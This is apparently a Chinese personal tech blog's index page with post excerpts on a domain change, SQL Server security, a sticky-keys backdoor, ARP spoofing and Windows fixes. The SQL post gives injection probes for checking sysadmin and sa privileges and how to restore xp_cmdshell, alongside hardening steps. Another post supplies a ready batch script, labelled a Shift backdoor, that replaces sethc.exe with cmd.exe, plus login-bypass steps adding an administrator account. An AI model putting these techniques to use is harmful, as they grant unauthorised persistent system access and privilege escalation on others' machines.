即日起，“晨曦博客”正式更名为“李程博客”！时隔多年，Licheng.net 终于归我所有！同时，
原域名 3018.com 和 chen-xi.cn 暂时保留访问。

      说起 licheng.net 这域名，据查询，03年有做站记录，国内注册的，06年底没续费，于07年1月14日
被删除，立即被enom抢注，一个老外预定走了。当时在上大学，苦于没有美元信用卡，无法在国外预定。
查看更多...

    07年时候，我在博客里写过关于SQL的安全，是从运行用户的角度考虑，设置安全权限，以防止被普通用户通过备份指令上传木马。。。详情参看原文（http://www.3018.com/article.asp?id=40）

    这几天闲来无事，所以打算详细谈谈SQL的安全。首先从黑客最基本的SQL入侵常用的xp_cmdshell扩展存储说起。以前一直没提这个，也是因为本人也常用这个扩展存储在肉鸡上提权，呵呵。今天就详细的写出来吧。

    在SQL Server中，只要具有sysadmin权限的用户可以，都可以通过xp_cmdshell存储扩展以system的权限执行任意系统命令，包括CMD命令和SQL命令。所以一旦服务器里的SQL管理员sa密码被破，而服务器里又没设置安全权限，那么你就乖乖沦为肉鸡吧`` 本文是安全系列文章，所以SA弱口令的破解及扫描就略过了~~

      黑客在选择目标时候，首先选择一个网站作为突破口，检测该站点SQL运行用户是否具有sysadmin权限，提交注入点检测方式：
www.XXX.com/show.asp?id=3018 and 1=(select IS_SRVROLEMEMBER('sysadmin'))
      如果返回正常，那就证明该站是以管理员用户运行SQL数据库，一般多是sa账户。
    那么是否就是sa用户呢，我们再来提交测试下：
www.XXX.com/show.asp?id=3018 and 'sa'=(Select System_user)  如果IE返回正常，就是SA用户。
（注：以上示例中的www.XXX.com/show.asp?id=3018 为网站注入点）

    如果你服务器提前删除了xp_cmdshell，黑客一般会再配合SQL另外2个存储，尽力得到webshell，再上传 xplog70.dll文件，帮你服务器恢复xp_cmdshell存储扩展。呵呵，下面是2个常用的存储，使用方法略过：

1.   Xp_regread    用来读取注册表信息，通过这个存储过程来得到保存在注册表中Web绝对路径
2.   sp_makewebtask  用来得到WebShell的，其主要功能就是导出数据库中表的记录为文件


    根据以上分析得出，我们在做好SQL安全运行用户及目录权限同时，还要删除一些必要的存储扩展。
另外结合其他一些手段，我们打造安全的服务器，本人总结的几点SQL安全设置的经验：


1：将以下有安全问题的SQL扩展存储过程删除.  将以下代码全部复制到"SQL查询分析器"：

use master
EXEC sp_dropextendedproc xp_cmdshell
EXEC sp_dropextendedproc Sp_OACreate
EXEC sp_dropextendedproc Sp_OADestroy
EXEC sp_dropextendedproc Sp_OAGetErrorInfo
EXEC sp_dropextendedproc Sp_OAGetProperty
EXEC sp_dropextendedproc Sp_OAMethod
EXEC sp_dropextendedproc Sp_OASetProperty
EXEC sp_dropextendedproc Sp_OAStop
EXEC sp_dropextendedproc Xp_regaddmultistring
EXEC sp_dropextendedproc Xp_regdeletekey
EXEC sp_dropextendedproc Xp_regdeletevalue
EXEC sp_dropextendedproc Xp_regenumvalues
EXEC sp_dropextendedproc Xp_regread
EXEC sp_dropextendedproc Xp_regremovemultistring
EXEC sp_dropextendedproc Xp_regwrite
drop procedure sp_makewebtask

恢复的命令是：
EXEC sp_addextendedproc 存储过程的名称,@dllname =存储过程的dll

例如：恢复存储过程xp_cmdshell
EXEC sp_addextendedproc xp_cmdshell,@dllname =xplog70.dll
另外，恢复时如果xplog70.dll已删除需要再copy一个。

2：新开的数据库，我们只给PUBLIC和DB_OWNER权限。网站里的SQL用户，一定不要用SA。

3：系统cmd.exe文件只保留administrators和sysytem权限。（这是为了防止入侵后直接可以提权）

4：可以设置IP策略，选择关闭1433端口的任意IP外连，只开启某某IP用户可以连接SQL服务器。因为服务器里网站是利用localhost本机连接，所以关闭外连端口，对网站的访问没有影响。（本人认为这招最绝，最安全，直接无法连接SQL服务器，更不用说提权了）

5：最后还是提及下，2年前写过的，关于SQL运行用户及目录安全：

  ㈠．计算机管理 -- 建立一个普通用户及密码（用户不允许更改密码，密码永不过期）
  ㈡．服务- Mssqlserver，更改运行用户，输入我们创建的用户和密码。默认为系统system用户。
    SQL 2000企业管理器， 属性-安全中设置的用户，输入创建的用户及密码。默认为系统system用户。

  ㈢．然后设置安装有SQL2000 的盘权限, 如:D盘

      D盘需要以下权限：

administrators 全部权限
System 全部权限
IIS_WPG只读与运行的权限(只应用在当前文件夹)

SQL2000的运行用户(只应用在当前文件夹)
   列出文件夹/读数据
  读属性
  读扩展属性
  读取权限


D:\Program Files\Microsoft SQL Server  (SQL数据库安装目录)
administrators 全部权限
System 全部权限
SQL2000的运行用户全部权限(该文件夹、子文件夹及文件夹)

  
     通过以上5点设置，一般就能彻底杜绝目前所有已知的SQL安全隐患。如果大家还有其他好想法，可以交流一下。

查看更多...

最近刚接手管理的公司一台服务器,三天两头发现被提权入侵,好郁闷...
开始接手时,我就立即设置了各种权限,自认为没什么安全漏洞了.但时隔几天,
就能发现administrators组多了用户...


今天又发现sqlDebugger被提权为管理员了,害我花大量时间去查SQL是否有注入点.
呵呵,,废话多了...进入原题,后来是偶然的发现是被人利用了系统粘滞键漏洞.至于
粘滞键大家都不陌生,只要连按5下shift键,就会被调用出来. 好,问题就在这了!!也
可以说是微软系统的一个安全漏洞吧,因为不仅仅是开机桌面状态下连按5下shift键
,就是远程连接的时候,没输用户和密码,也可以连按5下shift键调用粘滞键功能....


说到这,可能大家能想到了..只要将系统默认的粘滞键所调用文件替换掉其他文件,比如
说换成cmd.exe 这样就可以任意执行命令了!! 如果我们抓到一台肉鸡,按照上述方法,
即使提权的管理员用户被删,我们也可以远程空连,然后连续按5下shift键,就能调用出
命令提示行,接下来又可以创建个管理员....后果可想而知....


下面,我给出个批处理命令,是将cmd.exe替换到粘滞键所调用的sethc.exe文件:

@echo off
cls
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo.
echo Shift后门
echo 晨曦博客 http://www.chen-xi.cn
echo 使用方法:本文件执行完毕后,
echo 在终端界面按Shift 5次即可登陆系统!
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
del /q %systemroot%\system32\dllcache\sethc.exe
del /q %systemroot%\system32\sethc.exe
copy %systemroot%\system32\cmd.exe %systemroot%\system32\sethc.exe
copy %systemroot%\system32\cmd.exe %systemroot%\system32\dllcache\sethc.exe


将以上另存为 shift.bat 并运行它，系统里的 sethc.exe 就被换成了改了名的 cmd.exe了!

到这我就不多说了，明白人就知道如何利用这个漏洞!~  



另外按照以上思路,用连按5次shift键也可以破解windows的登录密码了..
首先用DOS盘启动.转到c:\windows\system32\下面.输入如下命令:

copy sethc.exe sethc2.exe   备份粘滞键文件
copy cmd.exe sethc.exe      用cmd.exe覆盖sethc.exe

然后重启机器.当需要输入密码的时候按5下shift就打开cmd窗口,然后输入:
net user admin admin /add     添加admin用户,密码是admin
net localgroup administrators admin /add   提升admin为管理员

查看更多...

本文由本人原创,授权发布站点:
中国站长站:http://www.chinaz.com/Server/Safe/0414E192007.html


    最近不少朋友及客户的服务器遇到arp欺骗攻击,造成站点被挂木马.
由于是采用ARP技术欺骗,所以主机并没入侵,在服务器里查看网页源码也
是没任何挂马代码,但是网站在访问时候却全部被挂马!

   开始我也不懂这就是网络传说中的ARP欺骗,后来查了下资料才知道这
就...

查看更多...

      今天上午美国服务器搬迁，在新服务器里安装SQL2000时候，总是提示：

   SQLServer安装程序配置服务器失败.参考服务器错误日志和c:\windows\sqlstp.log了解更多信息


   原因可能是以前装过SQL没卸载干净，注册表里还有相关配置，下面也是转载的网上的解决办法：


复制下面代码，存为后缀为.r...

查看更多...

2010年7月起，工信部执行新政策，网站备案需要现场拍照。

工信部规定的幕布中，网站主办者需要显示上半身。
ISP接入单位名称树形条码，需要为半个身体的分界线。
采集的照片像素为800*600  右下角需显示拍照时间。

查看更多...

该日志是私密日志，只有管理员或发布者可以查看！

该日志是私密日志，只有管理员或发布者可以查看！

搜索文件时出现“意外错误 操作无法完成”，问题解决方案：

    最近，发现电脑搜索时都出现了“意外错误 操作无法完成”，这是因为注册表少几个键值，多为恶意
插件所为。解决方法很简单，只用记事本写个“还原.reg”文件导入注册表就可以了。代码如下：

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVers...

查看更多...

       现在大部分人做网页，都是直接用DW插入flash，而且DW也是所见即所得，直接生成了相应的flash
显示代码。可是我们又有多少人了解这些直接由DW生成的代码呢？其实我接触flash player标签，是在刚
学习html的时候，那时书中插入flash只有最简单的<embed src="" width="" height=""></embed>一句,
而且在很长一段时间里...

查看更多...